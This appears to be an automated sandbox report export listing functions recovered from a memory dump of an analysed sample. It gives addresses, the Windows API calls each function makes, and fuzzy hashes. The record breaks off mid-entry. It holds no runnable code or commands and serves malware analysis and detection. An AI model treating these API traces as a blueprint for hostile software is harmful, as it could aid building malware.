Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 21f4107655deae1cb3eace835f98065a916c5ebee2071584cdf1a3e903bed314
Instruction ID: 42ceb2eb15aababb0173028f630b34079de0bf036e745c485ed132697c96fd33
Opcode Fuzzy Hash: 21f4107655deae1cb3eace835f98065a916c5ebee2071584cdf1a3e903bed314
Instruction Fuzzy Hash: 88115E79900218FFEB11DFA5CC84F9DBBB8FB48710F2040A6EA04B7250D6716E10DB90

Function 00331652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003301FD,?,00331250,?,00008000), ref: 0033166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,003301FD,?,00331250,?,00008000), ref: 00331694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003301FD,?,00331250,?,00008000), ref: 0033169E
Sleep.KERNEL32(?,?,?,?,?,?,?,003301FD,?,00331250,?,00008000), ref: 003316D1

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: cc538a46787149c6689e6e5a47554fa629a168a1fde2c94ce2bc2c37fad9e3f8
Instruction ID: 252f089fcbf08e7fb3d747195b11880c338ed5ccb5303c61e63ed605e0e1d642
Opcode Fuzzy Hash: cc538a46787149c6689e6e5a47554fa629a168a1fde2c94ce2bc2c37fad9e3f8
Instruction Fuzzy Hash: 43113C31C01A1DDBCF01AFE5D98AAEEBB7CFF09752F054095ED41B6250CB3056608B96

Function 00307207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0030722B

Part of subcall function 00307912: __fltout2.LIBCMT ref: 0030793B

__cftog_l.LIBCMT ref: 00307251
__cftoe_l.LIBCMT ref: 00307283

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 5dcbcd71115f02164ab70422255ede97f10325897e26c6ccc5723f826193c484
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 2501803284514EBBCF535F84CC118EE3F2ABF19340B498915FA1858071C337E9B1AB81

Function 0035B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0035B59E
ScreenToClient.USER32(?,?), ref: 0035B5B6
ScreenToClient.USER32(?,?), ref: 0035B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0035B5F5

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 1c042699668b6879805d14b5fd1ef5b6ad96cff3f392e5059f9ffba8e10582b2
Instruction ID: c2ad5e290a5b8ea58d357cb22686344ef7bf2b990196daf0fa7735bb340d7c97
Opcode Fuzzy Hash: 1c042699668b6879805d14b5fd1ef5b6ad96cff3f392e5059f9ffba8e10582b2
Instruction Fuzzy Hash: C51143B9D00209EFDB41CFA9C8849EEFBB9FB08311F108166E914E3220D735AA558F90

Function 0035B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0035B8FE
_memset.LIBCMT ref: 0035B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00397F20,00397F64), ref: 0035B93C
CloseHandle.KERNEL32 ref: 0035B94E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 128b7441c18d0e40e337cb2532925bc506bf797eb126be4245a7d74d11cb4528
Instruction ID: 4bd1ebbb30f07a550a73b8f6c7aa8e79724854adfc78df58ccb7b4c8bc2e9f45
Opcode Fuzzy Hash: 128b7441c18d0e40e337cb2532925bc506bf797eb126be4245a7d74d11cb4528
Instruction Fuzzy Hash: D7F05EB65643047FF6127761AC05FBB7B5CEB09395F000032BB09E51E2D772891087A8

Function 00336E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00336E88

Part of subcall function 0033794E: _memset.LIBCMT ref: 00337983

_memmove.LIBCMT ref: 00336EAB
_memset.LIBCMT ref: 00336EB8
RtlLeaveCriticalSection.NTDLL(?), ref: 00336EC8

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 4882b2495a028cf18a27deec2878802d6b76826b02c3988e1e2057cdb7ea502d
Instruction ID: a33696027f11bdab03b528ac0fc594c838a80ba112400e8e68387240f4a9ed95
Opcode Fuzzy Hash: 4882b2495a028cf18a27deec2878802d6b76826b02c3988e1e2057cdb7ea502d
Instruction Fuzzy Hash: CAF0547A100204AFCF016F55DC85F5AFB29EF45361F048065FE085E226CB31E961CBB4

Function 0035C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 002D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D134D
Part of subcall function 002D12F3: SelectObject.GDI32(?,00000000), ref: 002D135C
Part of subcall function 002D12F3: BeginPath.GDI32(?), ref: 002D1373
Part of subcall function 002D12F3: SelectObject.GDI32(?,00000000), ref: 002D139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0035C030
LineTo.GDI32(00000000,?,?), ref: 0035C03D
EndPath.GDI32(00000000), ref: 0035C04D
StrokePath.GDI32(00000000), ref: 0035C05B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: c0e2642b0bf4d87544f194eca178f33c8a4032dca7019fd27a730bf4cc568a02
Instruction ID: 77cef341eb0705dab3efb394ccc90e418093cc75c466c11dab34e8ef0d18e3ca
Opcode Fuzzy Hash: c0e2642b0bf4d87544f194eca178f33c8a4032dca7019fd27a730bf4cc568a02
Instruction Fuzzy Hash: 4EF03A31005369BBDB136F55AC0EFCA3B9DAF05312F084001FA11620F287665665CB95

Function 0032A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0032A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0032A3AC
GetCurrentThreadId.KERNEL32 ref: 0032A3B3
AttachThreadInput.USER32(00000000), ref: 0032A3BA

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: d5bb93a3da01b7de429eda73b6efde239e12c65bd05d577481a1146af9937f0a
Instruction ID: e4e62190ddd8ad68fb719762059cf316745a54410fbba498c2d0d679fe1dd6d4
Opcode Fuzzy Hash: d5bb93a3da01b7de429eda73b6efde239e12c65bd05d577481a1146af9937f0a
Instruction Fuzzy Hash: 02E0C931645738BBDB225BA2EC0DED77F5CEF167A2F008025F60995071C6758540DBE1

Function 002D2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 002D2231
SetTextColor.GDI32(?,000000FF), ref: 002D223B
SetBkMode.GDI32(?,00000001), ref: 002D2250
GetStockObject.GDI32(00000005), ref: 002D2258
GetWindowDC.USER32(?,00000000), ref: 0030C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0030C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0030C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0030C112
GetPixel.GDI32(00000000,?,?), ref: 0030C132
ReleaseDC.USER32(?,00000000), ref: 0030C13D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: ad7e5230d9f8d241d5facfff6fce2d3d260be754165e1e223d0ebf10e00f22ed
Instruction ID: 8392d325a55c4e64d6d6ab00aab5209111bfcca1039a35dfa3f4f2be6f95cd5a
Opcode Fuzzy Hash: ad7e5230d9f8d241d5facfff6fce2d3d260be754165e1e223d0ebf10e00f22ed
Instruction Fuzzy Hash: C2E06D32100644EEDB225F74FC0DBD87B18EB15333F008366FAA9480F187718A90DB11

Function 00328C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00328C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0032882E), ref: 00328C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0032882E), ref: 00328C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0032882E), ref: 00328C7E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 021a8d6f3701aa10733d8cd5830950ae577fe925056ee23a2ec8e2039955b734
Instruction ID: a28e6e565733f30972eed81efba996d542bbe7d85ce38e6a64ac0e6a26ce2928
Opcode Fuzzy Hash: 021a8d6f3701aa10733d8cd5830950ae577fe925056ee23a2ec8e2039955b734
Instruction Fuzzy Hash: 71E04F766423219FD7225FB0BD0CB577BACAF50793F094828A245CA0A0DA3484418B61

Function 00312187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00312187
GetDC.USER32(00000000), ref: 00312191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 003121B1
ReleaseDC.USER32(?), ref: 003121D2

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3ed2e8687248ea47c909291771756b4e44df8d9f07b0dc91ce562a0396bcddaf
Instruction ID: 341bccd59b7f53e2a578c07a3d6031fd9ea06315de0c8f353a21ba9535f4660f
Opcode Fuzzy Hash: 3ed2e8687248ea47c909291771756b4e44df8d9f07b0dc91ce562a0396bcddaf
Instruction Fuzzy Hash: 1EE0E575810614EFDB029F60C808A9E7BB9EB4C352F218426F95A97260DB7885919F40

Function 0031219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0031219B
GetDC.USER32(00000000), ref: 003121A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 003121B1
ReleaseDC.USER32(?), ref: 003121D2

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 9c4f24c0212e58fc04b0ad3c5006029a13b065fffb954cf5e3554de2c1ba9d6e
Instruction ID: 16aa32c72d27e8a5b7a837e2ec46e52a59eef1e328c237f9b62fb298677f67d9
Opcode Fuzzy Hash: 9c4f24c0212e58fc04b0ad3c5006029a13b065fffb954cf5e3554de2c1ba9d6e
Instruction Fuzzy Hash: C5E0EEB5810204AFCB029FA0C80869EBBA9AB4C312F21802AF95AA7260DB7895419F40

Function 002D63A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%6, xrefs: 002D63AE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID: %6
API String ID: 0-3279475170
Opcode ID: aadf08da2f4cdb84f1c15653d1109ef6a05f35a76061652d18c083b93447c9c1
Instruction ID: a0a5ea29dd3860f782e6bb4d213513c8619fa095e0adbc1fd670421962874898
Opcode Fuzzy Hash: aadf08da2f4cdb84f1c15653d1109ef6a05f35a76061652d18c083b93447c9c1
Instruction Fuzzy Hash: E5B1F57192410A9BCF24EF98C4999FEB7B8FF44310F504027E902A7391EB749EA5CB91

Function 0034B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0034B2C3

Strings

xr9, xrefs: 0034B2F9
xr9, xrefs: 0034B325

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __itow_s
String ID: xr9$xr9
API String ID: 3653519197-2676925938
Opcode ID: e7d7cb742bc98b2334251de212ae61cd8499ea5344452778cbe129c4a012e3ad
Instruction ID: 1c530650548133203efff70aeec35b15910a2f2ccbca1ce51bc7122f24e781f0
Opcode Fuzzy Hash: e7d7cb742bc98b2334251de212ae61cd8499ea5344452778cbe129c4a012e3ad
Instruction Fuzzy Hash: 92B16C74A00109AFCB15EF55C880EAAF7F9EF58300F14845AF9459F292EB71EE51CB60

Function 00349A72 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00327652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0032758C,80070057,?,?), ref: 00327698

_memset.LIBCMT ref: 00349B28
_memset.LIBCMT ref: 00349C6B

Strings

NULL Pointer assignment, xrefs: 00349CF0

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memset$lstrcmpi
String ID: NULL Pointer assignment
API String ID: 1020867613-2785691316
Opcode ID: 935b7ebaa2fd9da626f9a61812c4dc07e18aac28d8f5a5ab0fa950d5a145e89a
Instruction ID: 0200a3e2e8285fd0f44f1c4a9a0ef49b395561fdc2852ec0409fe22a792b530a
Opcode Fuzzy Hash: 935b7ebaa2fd9da626f9a61812c4dc07e18aac28d8f5a5ab0fa950d5a145e89a
Instruction Fuzzy Hash: 7B912A71D00229ABDB11DFA4DC85ADEBBB9AF08710F20415AF519AB251DB71AA44CFA0

Function 0033B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 002EFEC6: _wcscpy.LIBCMT ref: 002EFEE9

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

__wcsnicmp.LIBCMT ref: 0033B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0033B361

Strings

LPT, xrefs: 0033B292

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 91a9becd754c9d006a5a82cc94723231916e9f17b8e7825717d26399761db036
Instruction ID: 29ff7cbd8c84866ebd2d72cae82174be4bba12c5f58f01adac83240815989f01
Opcode Fuzzy Hash: 91a9becd754c9d006a5a82cc94723231916e9f17b8e7825717d26399761db036
Instruction Fuzzy Hash: 58617275A10215EFCB15DF94C891EAEF7B4EF08310F15456AFA46AB391DB70AE80CB50

Function 00318A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00318B1E
_memmove.LIBCMT ref: 00318B78

Strings

Oa., xrefs: 00318BF2, 0031E39A, 0031E3B6

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
